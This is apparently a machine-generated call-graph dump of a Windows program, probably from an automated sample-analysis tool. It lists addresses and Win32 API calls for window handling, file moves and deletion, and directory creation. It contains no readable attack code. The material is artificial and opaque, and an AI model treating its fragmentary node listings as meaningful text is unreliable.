50517->50519 50518->50516 50519->50507 50520->50509 50521->50511 56346 48042c 56351 450ff0 56346->56351 56348 480440 56361 47f518 56348->56361 56350 480464 56352 450ffd 56351->56352 56354 451051 56352->56354 56367 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56352->56367 56355 450e74 InterlockedExchange 56354->56355 56356 451063 56355->56356 56358 451079 56356->56358 56368 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56356->56368 56359 4510bc 56358->56359 56369 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56358->56369 56359->56348 56370 40b5c8 56361->56370 56363 47f585 56363->56350 56364 4069e4 4 API calls 56366 47f53a 56364->56366 56366->56363 56366->56364 56374 4768b0 56366->56374 56367->56354 56368->56358 56369->56359 56371 40b5d3 56370->56371 56373 40b5f3 56371->56373 56390 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56371->56390 56373->56366 56382 47692a 56374->56382 56387 4768e1 56374->56387 56375 476975 56391 451280 56375->56391 56377 4038a4 4 API calls 56377->56387 56378 47698c 56380 403420 4 API calls 56378->56380 56379 4038a4 4 API calls 56379->56382 56381 4769a6 56380->56381 56381->56366 56382->56375 56382->56379 56385 403744 4 API calls 56382->56385 56386 403450 4 API calls 56382->56386 56389 451280 21 API calls 56382->56389 56383 403744 4 API calls 56383->56387 56384 403450 4 API calls 56384->56387 56385->56382 56386->56382 56387->56377 56387->56382 56387->56383 56387->56384 56388 451280 21 API calls 56387->56388 56388->56387 56389->56382 56390->56373 56392 45129b 56391->56392 56396 451290 56391->56396 56397 451224 21 API calls 56392->56397 56394 4512a6 56394->56396 56398 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56394->56398 56396->56378 56397->56394 56398->56396 56399 41ee64 56400 41ee73 IsWindowVisible 56399->56400 56401 41eea9 56399->56401 56400->56401 56402 41ee7d IsWindowEnabled 56400->56402 56402->56401 56403 41ee87 56402->56403 56404 402648 4 API calls 56403->56404 56405 41ee91 EnableWindow 56404->56405 56405->56401 56406 41fb68 56407 41fb71 56406->56407 56410 41fe0c 56407->56410 56409 41fb7e 56411 41fefe 56410->56411 56412 41fe23 56410->56412 56411->56409 56412->56411 56431 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 56412->56431 56414 41fe59 56415 41fe83 56414->56415 56416 41fe5d 56414->56416 56441 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 56415->56441 56432 41fbac 56416->56432 56420 41fe91 56422 41fe95 56420->56422 56423 41febb 56420->56423 56421 41fbac 10 API calls 56426 41fe81 56421->56426 56424 41fbac 10 API calls 56422->56424 56425 41fbac 10 API calls 56423->56425 56427 41fea7 56424->56427 56428 41fecd 56425->56428 56426->56409 56429 41fbac 10 API calls 56427->56429 56430 41fbac 10 API calls 56428->56430 56429->56426 56430->56426 56431->56414 56433 41fbc7 56432->56433 56434 41fbdd 56433->56434 56435 41f94c 4 API calls 56433->56435 56442 41f94c 56434->56442 56435->56434 56437 41fc25 56438 41fc48 SetScrollInfo 56437->56438 56450 41faac 56438->56450 56441->56420 56443 4181f0 56442->56443 56444 41f969 GetWindowLongA 56443->56444 56445 41f9a6 56444->56445 56446 41f986 56444->56446 56462 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 56445->56462 56461 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 56446->56461 56449 41f992 56449->56437 56451 41faba 56450->56451 56452 41fac2 56450->56452 56451->56421 56453 41faff 56452->56453 56454 41fb01 56452->56454 56455 41faf1 56452->56455 56456 41fb41 GetScrollPos 56453->56456 56464 417e58 IsWindowVisible ScrollWindow SetWindowPos 56454->56464 56463 417e58 IsWindowVisible ScrollWindow SetWindowPos 56455->56463 56456->56451 56459 41fb4c 56456->56459 56460 41fb5b SetScrollPos 56459->56460 56460->56451 56461->56449 56462->56449 56463->56453 56464->56453 56465 4205a8 56466 4205bb 56465->56466 56486 415b40 56466->56486 56468 4205f6 56469 420702 56468->56469 56470 420661 56468->56470 56479 420652 MulDiv 56468->56479 56473 420719 56469->56473 56493 4146e4 KiUserCallbackDispatcher 56469->56493 56491 420858 20 API calls 56470->56491 56472 420730 56476 420752 56472->56476 56495 420070 12 API calls 56472->56495 56473->56472 56494 414728 KiUserCallbackDispatcher 56473->56494 56477 42067a 56477->56469 56492 420070 12 API calls 56477->56492 56490 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 56479->56490 56482 420697 56483 4206b3 MulDiv 56482->56483 56484 4206d6 56482->56484 56483->56484 56484->56469 56485 4206df MulDiv 56484->56485 56485->56469 56487 415b52 56486->56487 56496 414480 56487->56496 56489 415b6a 56489->56468 56490->56470 56491->56477 56492->56482 56493->56473 56494->56472 56495->56476 56497 41449a 56496->56497 56500 410658 56497->56500 56499 4144b0 56499->56489 56503 40dea4 56500->56503 56502 41065e 56502->56499 56504 40df06 56503->56504 56506 40deb7 56503->56506 56510 40df14 56504->56510 56508 40df14 19 API calls 56506->56508 56509 40dee1 56508->56509 56509->56502 56511 40df24 56510->56511 56513 40df3a 56511->56513 56522 40e29c 56511->56522 56538 40d7e0 56511->56538 56541 40e14c 56513->56541 56516 40d7e0 5 API calls 56517 40df42 56516->56517 56517->56516 56518 40dfae 56517->56518 56544 40dd60 56517->56544 56520 40e14c 5 API calls 56518->56520 56521 40df10 56520->56521 56521->56502 56558 40eb6c 56522->56558 56524 403778 4 API calls 56526 40e2d7 56524->56526 56525 40e38d 56527 40e3b7 56525->56527 56528 40e3a8 56525->56528 56526->56524 56526->56525 56621 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56526->56621 56622 40e280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56526->56622 56618 40bc24 56527->56618 56567 40e5c0 56528->56567 56533 40e3b5 56535 403400 4 API calls 56533->56535 56536 40e45c 56535->56536 56536->56511 56539 40ec08 5 API calls 56538->56539 56540 40d7ea 56539->56540 56540->56511 56655 40d6bc 56541->56655 56664 40e154 56544->56664 56547 40eb6c 5 API calls 56548 40dd9e 56547->56548 56549 40eb6c 5 API calls 56548->56549 56550 40dda9 56549->56550 56551 40ddc4 56550->56551 56552 40ddbb 56550->56552 56557 40ddc1 56550->56557 56671 40dbd8 56551->56671 56674 40dcc8 19 API calls 56552->56674 56555 403420 4 API calls 56556 40de8f 56555->56556 56556->56517 56557->56555 56624 40d980 56558->56624 56561 4034e0 4 API calls 56562 40eb8f 56561->56562 56563 403744 4 API calls 56562->56563 56564 40eb96 56563->56564 56565 40d980 5 API calls 56564->56565 56566 40eba4 56565->56566 56566->56526 56568 40e5f6 56567->56568 56569 40e5ec 56567->56569 56571 40e711 56568->56571 56572 40e695 56568->56572 56573 40e6f6 56568->56573 56574 40e776 56568->56574 56575 40e638 56568->56575 56576 40e6d9 56568->56576 56577 40e67a 56568->56577 56578 40e6bb 56568->56578 56589 40e65c 56568->56589 56629 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56569->56629 56587 40d964 5 API calls 56571->56587 56637 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56572->56637 56642 40ea90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56573->56642 56582 40d964 5 API calls 56574->56582 56630 40d964 56575->56630 56640 40eba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56576->56640 56636 40da18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56577->56636 56639 40dfe4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56578->56639 56581 403400 4 API calls 56590 40e7eb 56581->56590 56591 40e77e 56582->56591 56588 40e719 56587->56588 56595 40e723 56588->56595 56596 40e71d 56588->56596 56589->56581 56590->56533 56597 40e782 56591->56597 56598 40e79b 56591->56598 56592 40e6e4 56641 409f38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56592->56641 56594 40e6a0 56638 40d670 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56594->56638 56643 40ec08 56595->56643 56603 40e721 56596->56603 56604 40e73c 56596->56604 56606 40ec08 5 API calls 56597->56606 56649 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56598->56649 56600 40e661 56635 40e0d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56600->56635 56601 40e644 56633 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56601->56633 56647 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56603->56647 56610 40ec08 5 API calls 56604->56610 56606->56589 56613 40e744 56610->56613 56611 40e64f 56634 40e46c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56611->56634 56646 40daa0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56613->56646 56615 40e766 56648 40e4d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56615->56648 56650 40bbd0 56618->56650 56621->56526 56622->56526 56623 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56623->56533 56627 40d98b 56624->56627 56625 40d9c5 56625->56561 56627->56625 56628 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56627->56628 56628->56627 56629->56568 56631 40ec08 5 API calls 56630->56631 56632 40d96e 56631->56632 56632->56600 56632->56601 56633->56611 56634->56589 56635->56589 56636->56589 56637->56594 56638->56589 56639->56589 56640->56592 56641->56589 56642->56589 56644 40d980 5 API calls 56643->56644 56645 40ec15 56644->56645 56645->56589 56646->56589 56647->56615 56648->56589 56649->56589 56651 40bbe2 56650->56651 56653 40bc07 56650->56653 56651->56653 56654 40bc84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56651->56654 56653->56533 56653->56623 56654->56653 56656 40ec08 5 API calls 56655->56656 56657 40d6c9 56656->56657 56658 40d6dc 56657->56658 56662 40ed0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56657->56662 56658->56517 56660 40d6d7 56663 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56660->56663 56662->56660 56663->56658 56665 40d964 5 API calls 56664->56665 56666 40e16b 56665->56666 56667 40ec08 5 API calls 56666->56667 56670 40dd93 56666->56670 56668 40e178 56667->56668 56668->56670 56675 40e0d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56668->56675 56670->56547 56676 40ad7c 19 API calls 56671->56676 56673 40dc00 56673->56557 56674->56557 56675->56670 56676->56673 50522 491444 50523 49147e 50522->50523 50524 49148a 50523->50524 50525 491480 50523->50525 50527 491499 50524->50527 50528 4914c2 50524->50528 50718 4090a0 MessageBeep 50525->50718 50530 447008 18 API calls 50527->50530 50533 4914fa 50528->50533 50534 4914d1 50528->50534 50529 403420 4 API calls 50531 491ad6 50529->50531 50532 4914a6 50530->50532 50535 403400 4 API calls 50531->50535 50719 406bb8 50532->50719 50543 491509 50533->50543 50544 491532 50533->50544 50537 447008 18 API calls 50534->50537 50538 491ade 50535->50538 50540 4914de 50537->50540 50727 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50540->50727 50546 447008 18 API calls 50543->50546 50549 49155a 50544->50549 50550 491541 50544->50550 50545 4914e9 50728 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50545->50728 50548 491516 50546->50548 50729 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50548->50729 50557 491569 50549->50557 50558 49158e 50549->50558 50731 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 50550->50731 50553 491521 50730 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50553->50730 50554 491549 50732 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50554->50732 50559 447008 18 API calls 50557->50559 50561 49159d 50558->50561 50562 4915c6 50558->50562 50560 491576 50559->50560 50733 4072b0 50560->50733 50565 447008 18 API calls 50561->50565 50568 4915fe 50562->50568 50569 4915d5 50562->50569 50564 49157e 50736 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50564->50736 50567 4915aa 50565->50567 50737 42c814 50567->50737 50576 49164a 50568->50576 50577 49160d 50568->50577 50571 447008 18 API calls 50569->50571 50573 4915e2 50571->50573 50747 407200 8 API calls 50573->50747 50582 491659 50576->50582 50583 491682 50576->50583 50579 447008 18 API calls 50577->50579 50578 4915ed 50748 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50578->50748 50581 49161c 50579->50581 50584 447008 18 API calls 50581->50584 50585 447008 18 API calls 50582->50585 50589 4916ba 50583->50589 50590 491691 50583->50590 50586 49162d 50584->50586 50587 491666 50585->50587 50749 491148 8 API calls 50586->50749 50751 42c8b4 50587->50751 50600 4916c9 50589->50600 50601 4916f2 50589->50601 50593 447008 18 API calls 50590->50593 50591 491639 50750 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50591->50750 50596 49169e 50593->50596 50757 42c8dc 50596->50757 50597 491485 50597->50529 50603 447008 18 API calls 50600->50603 50606 49172a 50601->50606 50607 491701 50601->50607 50605 4916d6 50603->50605 50766 42c90c LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50605->50766 50614 491739 50606->50614 50615 491762 50606->50615 50609 447008 18 API calls 50607->50609 50611 49170e 50609->50611 50610 4916e1 50767 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50610->50767 50768 42c93c 50611->50768 50617 447008 18 API calls 50614->50617 50621 4917ae 50615->50621 50622 491771 50615->50622 50618 491746 50617->50618 50774 42c964 50618->50774 50627 4917bd 50621->50627 50628 491800 50621->50628 50624 447008 18 API calls 50622->50624 50626 491780 50624->50626 50629 447008 18 API calls 50626->50629 50630 447008 18 API calls 50627->50630 50634 49180f 50628->50634 50635 491873 50628->50635 50631 491791 50629->50631 50632 4917d0 50630->50632 50780 42c508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50631->50780 50636 447008 18 API calls 50632->50636 50638 447008 18 API calls 50634->50638 50643 4918b2 50635->50643 50644 491882 50635->50644 50639 4917e1 50636->50639 50637 49179d 50781 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50637->50781 50641 49181c 50638->50641 50782 491340 12 API calls 50639->50782 50710 42c618 7 API calls 50641->50710 50655 4918f1 50643->50655 50656 4918c1 50643->50656 50647 447008 18 API calls 50644->50647 50646 4917ef 50783 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50646->50783 50650 49188f 50647->50650 50648 49182a 50651 49182e 50648->50651 50652 491863 50648->50652 50786 4528f4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 50650->50786 50654 447008 18 API calls 50651->50654 50785 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50652->50785 50659 49183d 50654->50659 50664 491930 50655->50664 50665 491900 50655->50665 50660 447008 18 API calls 50656->50660 50658 49189c 50787 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50658->50787 50711 452c6c 50659->50711 50663 4918ce 50660->50663 50788 45275c 50663->50788 50674 491978 50664->50674 50675 49193f 50664->50675 50670 447008 18 API calls 50665->50670 50666 4918ad 50666->50597 50667 49184d 50784 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50667->50784 50669 4918db 50795 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50669->50795 50673 49190d 50670->50673 50796 452dfc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 50673->50796 50682 4919c0 50674->50682 50683 491987 50674->50683 50677 447008 18 API calls 50675->50677 50679 49194e 50677->50679 50678 49191a 50797 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50678->50797 50681 447008 18 API calls 50679->50681 50684 49195f 50681->50684 50687 4919d3 50682->50687 50694 491a89 50682->50694 50685 447008 18 API calls 50683->50685 50690 447288 5 API calls 50684->50690 50686 491996 50685->50686 50688 447008 18 API calls 50686->50688 50691 447008 18 API calls 50687->50691 50689 4919a7 50688->50689 50695 447288 5 API calls 50689->50695 50690->50597 50692 491a00 50691->50692 50693 447008 18 API calls 50692->50693 50696 491a17 50693->50696 50694->50597 50801 446fac 18 API calls 50694->50801 50695->50597 50798 407de4 7 API calls 50696->50798 50698 491aa2 50802 42e8d8 FormatMessageA 50698->50802 50703 491a39 50704 447008 18 API calls 50703->50704 50705 491a4d 50704->50705 50799 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50705->50799 50707 491a58 50800 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50707->50800 50709 491a64 50710->50648 50807 452710 50711->50807 50713 452c89 50713->50667 50714 452c85 50714->50713 50715 452cad MoveFileA GetLastError 50714->50715 50813 45274c 50715->50813 50718->50597 50720 406bc7 50719->50720 50721 406be0 50720->50721 50722 406be9 50720->50722 50723 403400 4 API calls 50721->50723 50816 403778 50722->50816 50724 406be7 50723->50724 50726 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50724->50726 50726->50597 50727->50545 50728->50597 50729->50553 50730->50597 50731->50554 50732->50597 50734 403738 50733->50734 50735 4072ba SetCurrentDirectoryA 50734->50735 50735->50564 50736->50597 50738 403738 50737->50738 50739 42c837 GetFullPathNameA 50738->50739 50740 42c843 50739->50740 50741 42c85a 50739->50741 50740->50741 50743 42c84b 50740->50743 50742 403494 4 API calls 50741->50742 50744 42c858 50742->50744 50745 4034e0 4 API calls 50743->50745 50746 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50744->50746 50745->50744 50746->50597 50747->50578 50748->50597 50749->50591 50750->50597 50823 42c7ac 50751->50823 50754 403778 4 API calls 50755 42c8d5 50754->50755 50756 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50755->50756 50756->50597 50838 42c684 50757->50838 50760 42c8f0 50762 403400 4 API calls 50760->50762 50761 42c8f9 50763 403778 4 API calls 50761->50763 50764 42c8f7 50762->50764 50763->50764 50765 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50764->50765 50765->50597 50766->50610 50767->50597 50769 42c7ac IsDBCSLeadByte 50768->50769 50770 42c94c 50769->50770 50771 403778 4 API calls 50770->50771 50772 42c95e 50771->50772 50773 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50772->50773 50773->50597 50775 42c7ac IsDBCSLeadByte 50774->50775 50776 42c974 50775->50776 50777 403778 4 API calls 50776->50777 50778 42c985 50777->50778 50779 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50778->50779 50779->50597 50780->50637 50781->50597 50782->50646 50783->50597 50784->50597 50785->50597 50786->50658 50787->50666 50789 452710 2 API calls 50788->50789 50790 452772 50789->50790 50791 452776 50790->50791 50792 452794 CreateDirectoryA GetLastError 50790->50792 50791->50669 50793 45274c Wow64RevertWow64FsRedirection 50792->50793 50794 4527ba 50793->50794 50794->50669 50795->50597 50796->50678 50797->50597 50798->50703 50799->50707 50800->50709 50801->50698 50803 42e8fe 50802->50803 50804 4034e0 4 API calls 50803->50804 50805 42e91b 50804->50805 50806 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50805->50806 50806->50597 50808 45271e 50807->50808 50809 45271a 50807->50809 50810 452727 Wow64DisableWow64FsRedirection 50808->50810 50811 452740 SetLastError 50808->50811 50809->50714 50812 45273b 50810->50812 50811->50812 50812->50714 50814 452751 Wow64RevertWow64FsRedirection 50813->50814 50815 45275b 50813->50815 50814->50815 50815->50667 50817 4037aa 50816->50817 50818 40377d 50816->50818 50819 403400 4 API calls 50817->50819 50818->50817 50820 403791 50818->50820 50822 4037a0 50819->50822 50821 4034e0 4 API calls 50820->50821 50821->50822 50822->50724 50828 42c68c 50823->50828 50825 42c7c1 50826 42c80b 50825->50826 50835 42c454 IsDBCSLeadByte 50825->50835 50826->50754 50831 42c69d 50828->50831 50829 42c701 50832 42c6fc 50829->50832 50837 42c454 IsDBCSLeadByte 50829->50837 50831->50829 50833 42c6bb 50831->50833 50832->50825 50833->50832 50836 42c454 IsDBCSLeadByte 50833->50836 50835->50825 50836->50833 50837->50832 50839 42c68c IsDBCSLeadByte 50838->50839 50840 42c68b 50839->50840 50840->50760 50840->50761 50841 41364c SetWindowLongA GetWindowLongA 50842 4136a9 SetPropA SetPropA 50841->50842 50843 41368b GetWindowLongA 50841->50843 50847 41f3ac 50842->50847 50843->50842 50844 41369a SetWindowLongA 50843->50844 50844->50842 50852 415280 50847->50852 50859 423c1c 50847->50859 50953 423a94 50847->50953 50848 4136f9 50853 41528d 50852->50853 50854 4152f3 50853->50854 50855 4152e8 50853->50855 50858 4152f1 50853->50858 50960 424b9c 13 API calls 50854->50960 50855->50858 50961 41506c 46 API calls 50855->50961 50858->50848 50864 423c52 50859->50864 50862 423cfc 50865 423d03 50862->50865 50866 423d37 50862->50866 50863 423c9d 50867 423ca3 50863->50867 50868 423d60 50863->50868 50878 423c73 50864->50878 50962 423b78 50864->50962 50869 423d09 50865->50869 50912 423fc1 50865->50912 50872 423d42 50866->50872 50873 4240aa IsIconic 50866->50873 50870 423cd5 50867->50870 50871 423ca8 50867->50871 50874 423d72 50868->50874 50875 423d7b 50868->50875 50876 423f23 SendMessageA 50869->50876 50877 423d17 50869->50877 50870->50878 50902 423cee 50870->50902 50903 423e4f 50870->50903 50880 423e06 50871->50880 50881 423cae 50871->50881 50882 4240e6 50872->50882 50883 423d4b 50872->50883 50873->50878 50879 4240be GetFocus 50873->50879 50884 423d88 50874->50884 50885 423d79 50874->50885 50971 4241a4 11 API calls 50875->50971 50876->50878 50877->50878 50904 423cd0 50877->50904 50933 423f66 50877->50933 50878->50848 50879->50878 50890 4240cf 50879->50890 50984 423b94 NtdllDefWindowProc_A 50880->50984 50891 423cb7 50881->50891 50892 423e2e PostMessageA 50881->50892 51006 424860 WinHelpA PostMessageA 50882->51006 50888 4240fd 50883->50888 50883->50904 50972 4241ec IsIconic 50884->50972 50980 423b94 NtdllDefWindowProc_A 50885->50980 50900 424106 50888->50900 50901 42411b 50888->50901 51005 41f004 GetCurrentThreadId 73A15940 50890->51005 50897 423cc0 50891->50897 50898 423eb5 50891->50898 50990 423b94 NtdllDefWindowProc_A 50892->50990 50907 423cc9 50897->50907 50908 423dde IsIconic 50897->50908 50909 423ebe 50898->50909 50910 423eef 50898->50910 50899 423e49 50899->50878 51007 4244e4 50900->51007 51013 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 50901->51013 50902->50904 50913 423e1b 50902->50913 50966 423b94 NtdllDefWindowProc_A 50903->50966 50904->50878 50970 423b94 NtdllDefWindowProc_A 50904->50970 50906 4240d6 50906->50878 50921 4240de SetFocus 50906->50921 50907->50904 50922 423da1 50907->50922 50915 423dfa 50908->50915 50916 423dee 50908->50916 50992 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50909->50992 50967 423b94 NtdllDefWindowProc_A 50910->50967 50912->50878 50924 423fe7 IsWindowEnabled 50912->50924 50985 424188 50913->50985 50983 423b94 NtdllDefWindowProc_A 50915->50983 50982 423bd0 15 API calls 50916->50982 50920 423e55 50928 423e93 50920->50928 50929 423e71 50920->50929 50921->50878 50922->50878 50981 422c5c ShowWindow PostMessageA PostQuitMessage 50922->50981 50924->50878 50931 423ff5 50924->50931 50927 423ef5 50932 423f0d 50927->50932 50968 41eeb4 GetCurrentThreadId 73A15940 50927->50968 50935 423a94 6 API calls 50928->50935 50991 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50929->50991 50930 423ec6 50937 423ed8 50930->50937 50993 41ef68 50930->50993 50945 423ffc IsWindowVisible 50931->50945 50940 423a94 6 API calls 50932->50940 50933->50878 50941 423f88 IsWindowEnabled 50933->50941 50943 423e9b PostMessageA 50935->50943 50999 423b94 NtdllDefWindowProc_A 50937->50999 50940->50878 50941->50878 50946 423f96 50941->50946 50942 423e79 PostMessageA 50942->50878 50943->50878 50945->50878 50947 42400a GetFocus 50945->50947 51000 412320 7 API calls 50946->51000 51001 4181f0 50947->51001 50950 42401f SetFocus 51003 415250 50950->51003 50954 423b1d 50953->50954 50955 423aa4 50953->50955 50954->50848 50955->50954 50956 423aaa EnumWindows 50955->50956 50956->50954 50957 423ac6 GetWindow GetWindowLongA 50956->50957 51117 423a2c GetWindow 50956->51117 50958 423ae5 50957->50958 50958->50954 50959 423b11 SetWindowPos 50958->50959 50959->50954 50959->50958 50960->50858 50961->50858 50963 423b82 50962->50963 50964 423b8d 50962->50964 50963->50964 51014 408728 GetSystemDefaultLCID 50963->51014 50964->50862 50964->50863 50966->50920 50967->50927 50969 41ef39 50968->50969 50969->50932 50970->50878 50971->50878 50973 424233 50972->50973 50974 4241fd SetActiveWindow 50972->50974 50973->50878 51089 42365c 50974->51089 50978 42421a 50978->50973 50979 42422d SetFocus 50978->50979 50979->50973 50980->50878 50981->50878 50982->50878 50983->50878 50984->50878 51102 41db40 50985->51102 50988 4241a0 50988->50878 50989 424194 LoadIconA 50989->50988 50990->50899 50991->50942 50992->50930 50994 41ef70 IsWindow 50993->50994 50995 41ef9c 50993->50995 50996 41ef8a 50994->50996 50997 41ef7f EnableWindow 50994->50997 50995->50937 50996->50994 50996->50995 50998 402660 4 API calls 50996->50998 50997->50996 50998->50996 50999->50878 51000->50878 51002 4181fa 51001->51002 51002->50950 51004 41526b SetFocus 51003->51004 51004->50878 51005->50906 51006->50899 51008 4244f0 51007->51008 51009 42450a 51007->51009 51010 42451f 51008->51010 51011 4244f7 SendMessageA 51008->51011 51012 402648 4 API calls 51009->51012 51010->50878 51011->51010 51012->51010 51013->50899 51069 408570 GetLocaleInfoA 51014->51069 51019 408570 5 API calls 51020 40877d 51019->51020 51021 408570 5 API calls 51020->51021 51022 4087a1 51021->51022 51081 4085bc GetLocaleInfoA 51022->51081 51025 4085bc GetLocaleInfoA 51026 4087d1 51025->51026 51027 408570 5 API calls 51026->51027 51028 4087eb 51027->51028 51029 4085bc GetLocaleInfoA 51028->51029 51030 408808 51029->51030 51031 408570 5 API calls 51030->51031 51032 408822 51031->51032 51033 403450 4 API calls 51032->51033 51034 40882f 51033->51034 51035 408570 5 API calls 51034->51035 51036 408844 51035->51036 51037 403450 4 API calls 51036->51037 51038 408851 51037->51038 51039 4085bc GetLocaleInfoA 51038->51039 51040 40885f 51039->51040 51041 408570 5 API calls 51040->51041 51042 408879 51041->51042 51043 403450 4 API calls 51042->51043 51044 408886 51043->51044 51045 408570 5 API calls 51044->51045 51046 40889b 51045->51046 51047 403450 4 API calls 51046->51047 51048 4088a8 51047->51048 51049 408570 5 API calls 51048->51049 51050 4088bd 51049->51050 51051 4088da 51050->51051 51052 4088cb 51050->51052 51054 403494 4 API calls 51051->51054 51053 403494 4 API calls 51052->51053 51070 408597 51069->51070 51071 4085a9 51069->51071 51072 4034e0 4 API calls 51070->51072 51073 403494 4 API calls 51071->51073 51074 4085a7 51072->51074 51073->51074 51075 403450 51074->51075 51076 403454 51075->51076 51079 403464 51075->51079 51078 4034bc 4 API calls 51076->51078 51076->51079 51077 403490 51077->51019 51078->51079 51079->51077 51080 402660 4 API calls 51079->51080 51080->51077 51082 4085d8 51081->51082 51082->51025 51098 423608 SystemParametersInfoA 51089->51098 51092 423675 ShowWindow 51094 423680 51092->51094 51095 423687 51092->51095 51101 423638 SystemParametersInfoA 51094->51101 51097 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 51095->51097 51097->50978 51099 423626 51098->51099 51099->51092 51100 423638 SystemParametersInfoA 51099->51100 51100->51092 51101->51095 51105 41db64 51102->51105 51106 41db71 51105->51106 51109 41db4a 51105->51109 51106->51109 51114 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51106->51114 51108 41db8e 51108->51109 51110 41dba8 51108->51110 51111 41db9b 51108->51111 51109->50988 51109->50989 51115 41bd9c 11 API calls 51110->51115 51116 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51111->51116 51114->51108 51115->51109 51116->51109 51118 423a4d GetWindowLongA 51117->51118 51119 423a59 51117->51119 51118->51119 51120 4804c6 51121 4804cf 51120->51121 51122 4804fa 51120->51122 51121->51122 51123 4804ec 51121->51123 51125 480539 51122->51125 51560 47efb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51122->51560 51558 476b6c 188 API calls 51123->51558 51126 48055d 51125->51126 51129 480550 51125->51129 51130 480552 51125->51130 51133 480599 51126->51133 51134 48057b 51126->51134 51128 48052c 51561 47f018 42 API calls 51128->51561 51137 47eff4 42 API calls 51129->51137 51562 47f088 42 API calls 51130->51562 51131 4804f1 51131->51122 51559 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51131->51559 51565 47ee48 24 API calls 51133->51565 51138 480590 51134->51138 51563 47f018 42 API calls 51134->51563 51137->51126 51564 47ee48 24 API calls 51138->51564 51142 480597 51143 4805a9 51142->51143 51144 4805af 51142->51144 51145 4805ad 51143->51145 51246 47eff4 51143->51246 51144->51145 51146 47eff4 42 API calls 51144->51146 51251 47c3a4 51145->51251 51146->51145 51633 47eadc 42 API calls 51246->51633 51248 47f00f 51634 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51248->51634 51635 